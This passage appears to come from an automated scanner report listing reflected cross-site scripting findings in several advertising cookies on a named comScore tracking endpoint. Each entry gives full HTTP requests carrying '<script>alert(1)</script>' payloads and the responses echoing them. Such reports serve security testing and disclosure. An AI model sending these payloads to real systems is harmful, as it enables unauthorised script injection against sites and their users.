Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=13177536209f087<script>alert(1)</script>ea56a26f3e5

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:57 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=10&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:57 2011&96a74<script>alert(1)</script>9da2ecf03fe=&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:57 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27490

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
993-80.67.74.150-1314836282', "ar_fa24ecc87a8074b4bb32843e": 'exp=1&initExp=Wed Oct 5 14:34:42 2011&recExp=Wed Oct 5 14:34:42 2011&prad=71054949&arc=43921375&', "BMX_3PC": '1', "UIDR": '13177536209f087<script>alert(1)</script>ea56a26f3e5', "ar_p81479006": 'exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&', "ar_p63514475": 'exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat
...[SNIP]...

2.67. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p108883753 cookie is copied into the HTML document as plain text between tags. The payload 8eded<script>alert(1)</script>f05db26a88e was submitted in the ar_p108883753 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&8eded<script>alert(1)</script>f05db26a88e; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:54 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=33&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:54 2011&fa24ecc815e7f10ac27afd7e=&fa24ecc8d371cc1209e0420f=1&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:54 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27501

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
ue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&', "ar_p108883753": 'exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&8eded<script>alert(1)</script>f05db26a88e', "ar_p82806590": 'exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:
...[SNIP]...

2.68. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p109848095 cookie is copied into the HTML document as plain text between tags. The payload c33b5<script>alert(1)</script>285285dc290 was submitted in the ar_p109848095 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&c33b5<script>alert(1)</script>285285dc290; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:54 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=31&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:54 2011&fa24ecc815e7f10ac27afd7e=&fa24ecc8d371cc1209e0420f=1&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:54 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27501

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
41&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1317825169%2E084%2Cwait%2D%3E10000%2C', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&c33b5<script>alert(1)</script>285285dc290', "BMX_Gfa24ecc8e4f8d743c9d8e874": 'method%2D%3E%2D1%2Cts%2D%3E1317825169%2E084%2Cwait%2D%3E10000%2C', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=39
...[SNIP]...

2.69. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p110620504 cookie is copied into the HTML document as plain text between tags. The payload 3de2f<script>alert(1)</script>b7b6a60bca was submitted in the ar_p110620504 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&3de2f<script>alert(1)</script>b7b6a60bca; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=27&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:53 2011&fa24ecc815e7f10ac27afd7e=&fa24ecc8d371cc1209e0420f=1&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27500

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
ep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&3de2f<script>alert(1)</script>b7b6a60bca', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1317825169%2E084%2Cwait%2D%3E10000%2C', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&',
...[SNIP]...

2.70. http://ar.voicefive.com/bmx3/broker.pli [ar_p117672109 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p117672109 cookie is copied into the HTML document as plain text between tags. The payload ea45f<script>alert(1)</script>1f48ac03819 was submitted in the ar_p117672109 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&ea45f<script>alert(1)</script>1f48ac03819; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=6&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:56 2011&96a74<script>alert(1)</script>9da2ecf03fe=&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27490

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
</script>9da2ecf03fe=&prad=71054949&arc=43921375&', "ar_p117672109": 'exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&ea45f<script>alert(1)</script>1f48ac03819', "ar_p108883753": 'exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&', "ar_p82806590": 'exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:
...[SNIP]...

2.71. http://ar.voicefive.com/bmx3/broker.pli [ar_p119936314 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p119936314 cookie is copied into the HTML document as plain text between tags. The payload 96a74<script>alert(1)</script>9da2ecf03fe was submitted in the ar_p119936314 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&96a74<script>alert(1)</script>9da2ecf03fe; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=2&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:55 2011&96a74<script>alert(1)</script>9da2ecf03fe=&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27447

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
on Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&', "ar_p119936314": 'exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&96a74<script>alert(1)</script>9da2ecf03fe', "ar_p117672109": 'exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&', "ar_p108883753": 'exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:5
...[SNIP]...

2.72. http://ar.voicefive.com/bmx3/broker.pli [ar_p120927104 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p120927104 cookie is copied into the HTML document as plain text between tags. The payload f8340<script>alert(1)</script>0b39a60673d was submitted in the ar_p120927104 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&f8340<script>alert(1)</script>0b39a60673d; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=4&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:56 2011&96a74<script>alert(1)</script>9da2ecf03fe=&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27490

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
ac5f327cb56f2b5": 'method%2D%3E%2D1%2Cts%2D%3E1317825169%2E084%2Cwait%2D%3E10000%2C', "ar_p120927104": 'exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&f8340<script>alert(1)</script>0b39a60673d', "ar_p119936314": 'exp=3&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:55 2011&96a74<script>
...[SNIP]...

2.73. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]  previous  next

Summary

Severity:   Information
